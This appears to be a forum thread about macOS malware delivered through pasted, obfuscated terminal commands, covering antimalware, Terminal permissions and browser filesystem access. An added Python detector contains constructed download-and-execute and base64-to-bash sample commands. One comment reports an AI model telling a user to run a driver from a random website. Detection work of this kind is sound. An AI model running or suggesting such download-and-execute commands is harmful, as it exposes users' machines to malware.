GitHub too https://iboostup.com/blog/ai-fake-repositories-github
At least macOS has file access permissions.
Comparing to DOS or what? No one runs Win10/11 on FAT now, while NTFS has access permissions and ACLs.
I remember that Win32 apps on Windows 10 and 11 can do whatever they want with the user's personal files. Has that changed?
What does that even mean? NTFS file access permissions (35 years old at this point) are far more powerful than the 1970s-era Unix permissions model.
It's referring to the fact that Terminal doesn't have free access to all your files and folders, despite what the traditional file access perms say.
He’s talking about sandboxing and permissions prompts
Are we still pushing the myth that anti-malware on Mac isn't necessary?
I support quite a few Mac users and never recommend it myself. Also own a couple Macs and don’t use it.
I do occasionally use an app to clean somebody’s Mac of an irritating browser search hijack. I’ve never seen anything else.
Why should I change my mind?
No, that narrative died around 2010. The existence of malware targeting Macs has driven many macOS security improvements since, many of which are taken personally by HN readers.
How does antivirus software protect users who paste malicious commands they find online into the terminal?
By scanning downloaded binaries for known viruses?
A text command pasted into the terminal isn't a binary.
Convincing a Linux user to paste rm -rf / into the terminal is not malware. It's social engineering.
Scanning binaries for known malware is already built into the OS.
Endpoint security software on the Mac, if it's worth the hit to system resources that is, inspects every call to exec and fork that occurs in the kernel and also inspects those for known attack vectors, malicious scripts, etc. The one I have installed on my work Mac will kill reverse shell attempts before they are run. Will stop keychain attacks. Infostealing (as they can also get every file system op as they are happening in the kernel).
Gatekeeper and XProtect are good, but there's only so much they can do.
The article specifically mentions that the methodology here is to trick users into running an obfuscated CLI command…that downloads and runs a binary.
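As an added example (not code from the thread, the article, or any endpoint-security product), here is a minimal sketch of the command-line inspection the comments above describe: it decodes base64 layers in a command before matching it against download-and-run patterns. The rule names, patterns and sample commands are constructed for illustration.

```python
import base64
import binascii
import re

SHELL = r"(?:/bin/)?(?:ba|z|da)?sh\b"
RULES = {  # heuristic names and patterns are this example's own, not a product's
    "decode_piped_to_shell": re.compile(
        r"base64\s+(?:-d|-D|--decode)\b[^|;&]*\|\s*" + SHELL),
    "download_piped_to_shell": re.compile(
        r"\b(?:curl|wget)\b[^|;&]*\|\s*" + SHELL),
    "download_then_chmod_exec": re.compile(
        r"\b(?:curl|wget)\b.*?(?:&&|;)\s*chmod\s+\+x\b", re.S),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_layers(cmdline, max_depth=3):
    """Return the command plus every base64 payload it carries, decoded recursively."""
    layers, queue = [], [(cmdline, 0)]
    while queue:
        text, depth = queue.pop()
        layers.append(text)
        if depth >= max_depth:
            continue  # bound the work on deliberately nested input
        for token in B64_TOKEN.findall(text):
            try:
                decoded = base64.b64decode(token, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # a long path or hash, not encoded text
            queue.append((decoded, depth + 1))
    return layers


def inspect_exec(cmdline):
    """Return the sorted names of rules matching the command or any decoded layer."""
    hits = set()
    for layer in decode_layers(cmdline):
        hits.update(name for name, rx in RULES.items() if rx.search(layer))
    return sorted(hits)


# Constructed samples: example.invalid never resolves; none of this is from a real campaign.
INNER = ("curl -s https://example.invalid/update -o /tmp/update"
         " && chmod +x /tmp/update && /tmp/update")
PASTED = "echo '%s' | base64 -d | bash" % base64.b64encode(INNER.encode()).decode()
BENIGN = "curl -sO https://example.invalid/release.tar.gz"

if __name__ == "__main__":
    for sample in (PASTED, INNER, BENIGN):
        print(inspect_exec(sample) or "no match", "<-", sample[:60])
```

Piping a download into a shell is also how many legitimate installers work, so a match here is a signal to review, not a verdict.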
Terminal commands have the ability to do dangerous things, like deleting all the user's files.
In this case, the user is warned that the command wants to do something dangerous and must manually allow or deny the action.
It is necessary. That’s why Apple ships a free invisible one bundled into the OS that you never have to think about, see, or update.
XProtect (Apple's built-in antimalware) is usually all you need, as long as you're at least somewhat savvy (and sometimes even if you aren't). I believe installing any additional antimalware on a Mac is a waste of resources.
Actually… I think this can be solved by AI answers. I don’t look up commands on random websites, instead I ask an LLM for that kind of stuff. At the very least, check your commands with an LLM.
Yesterday I was debugging why on Windows, my Wifi would randomly disconnect every couple hours (whereas it worked on Linux). Claude decided it was a driver issue, and proceeded to download a driver update off a completely random website and told me to execute it.
My point is, this is not solved by AI answers.
What we used to have, 15 years ago, was a really well functioning Google. You could be lazy with your queries and still find what you wanted in the first two or three hits. Sometimes it was eerily accurate at figuring out what you were actually searching for. Modern Google is just not there even with AI answers, which are supposed to be infinitely better at natural language processing.
Google was such a revelation after the misery of Alta Vista and kin. I miss the days when I liked them.
Don’t the LLMs get their information from these random websites? They don’t know what is good and what is malware. Most of the time when I get an AI answer with a command in it, there is a reference to a random reddit post, or something similar.
Thanks for reminding me to turn off Full Disk Access for Terminal. I'm not sure why I had that one turned on.
Probably because you can’t even properly `ls` system directories without it.
depends which directories…
What would you do in the terminal without it?
Because it is useless without?
lol, is this serious? The final straw with Mac for me was when I accidentally hit “No” when asked if I wanted to give my terminal access to the file system. All of a sudden I was starting my work day without a working terminal. Obviously there was a solution, probably an easy one, but I didn’t even look for it.
> The final straw with Mac
> Obviously there was a solution, probably an easy one, but I didn’t even look for it
It's hard to take this seriously. It's the most obvious setting possible. Settings > Privacy & Security > Full Disk Access > tick the apps you want to have it.
What's even the complaint here? That Mac has solid app permissions, but you can't be bothered to open the settings?
The solution is to enable Full Disk Access in settings.
Another reason to avoid Medium like cold grits.
This sucks because the web should be the perfect, safe platform for this kind of application, but it isn't. Technically all the features exist in the browser such that you could write a homedir cleaner, space analyzer, etc purely in a browser tab, but because of the misguided (in my opinion) way that browsers refuse to open a homedir, it's impossible.
I'm not sure letting a webapp access your home is a good idea. You're basically YOLOing random remote code to run on your machine. Maybe we can have it access some specific folder for its own data.
And then there's also Apple which won't allow functional web apps, lest it affects their app store 30% cut.
Seems like a great idea for something to just run inside a chroot jail (or the modern equivalent, a container).
The web already has these APIs, it can be granted read-only permissions to designated directories. But the browsers will refuse to allow you to delegate even read-only access to, for example, the macOS ~/Applications folder, on the pretty shaky basis of it being "system files". Because of that policy the API is not useful for the application of a space analyzer.
A solution would be to stop shipping macs with the terminal app\s. Computers are now used by a wide variety of people, some without technical knowledge, maybe a default switch on macOS that displays warnings on rather trivial attacks would help.